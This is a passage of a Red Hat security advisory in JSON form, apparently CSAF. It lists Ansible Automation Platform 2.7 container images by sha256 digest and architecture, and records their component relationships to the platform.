"product_id": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9\u0026tag=1781118924"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator\u0026tag=1781102902"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9\u0026tag=1781104458"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-27/receptor-rhel9\u0026tag=1780679838"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64"
},
